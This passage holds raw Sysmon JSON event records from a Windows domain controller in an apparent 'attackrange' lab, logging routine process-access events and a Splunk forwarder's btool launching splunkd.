{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3024,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3025,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3026,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3027,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3028,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3029,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00109C110500}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00109C110500}","TargetProcessId":"4996","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3030,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.525\r\nProcessGuid: {A837DB8D-0238-5F25-0000-00105D120500}\r\nProcessId: 5080\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-0238-5F25-0000-00109C110500}\r\nParentProcessId: 4996\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.525","ProcessGuid":"{A837DB8D-0238-5F25-0000-00105D120500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-0238-5F25-0000-00109C110500}","ParentProcessId":"4996","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3031,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-0238-5F25-0000-00109C110500}\r\nSourceProcessId: 4996\r\nSourceThreadId: 5076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00105D120500}\r\nTargetProcessId: 5080\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.511","SourceProcessGUID":"{A837DB8D-0238-5F25-0000-00109C110500}","SourceProcessId":"4996","SourceThreadId":"5076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00105D120500}","TargetProcessId":"5080","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3032,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 